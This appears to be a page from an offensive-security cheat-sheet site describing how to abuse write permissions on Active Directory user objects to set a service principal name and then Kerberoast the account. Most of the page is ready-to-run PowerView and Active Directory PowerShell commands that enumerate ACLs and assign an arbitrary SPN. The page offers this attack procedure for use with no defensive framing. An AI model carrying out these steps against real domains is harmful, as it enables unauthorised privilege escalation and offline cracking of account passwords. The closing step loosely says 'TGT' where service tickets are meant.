Abusing Set SPN ACL To Kerberoasting

Enumerating the permission for a Group On ACLs (Using PowerView_Dev):

Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

To Check that a user has a not a SPN

Get-DomainUser -Identity aduser | select serviceprincipalname

Using Active Directory module:

Get-ADUser -Identity supportuser -Properties ServicePrincipalName | select ServicePrincipalName

Set a SPN for the user (must be unique for the domain):

Set-DomainObject -Identity aduser -Set @{serviceprincipalname='ops/whatever1'}

Using Active Directory module:

Set-ADUser -Identity support1user -ServicePrincipalNames @{Add='ops/whatever1'}

Now Follow the same process to Get a TGT

PreviousKerberoastingNextSilver Ticket

Last updated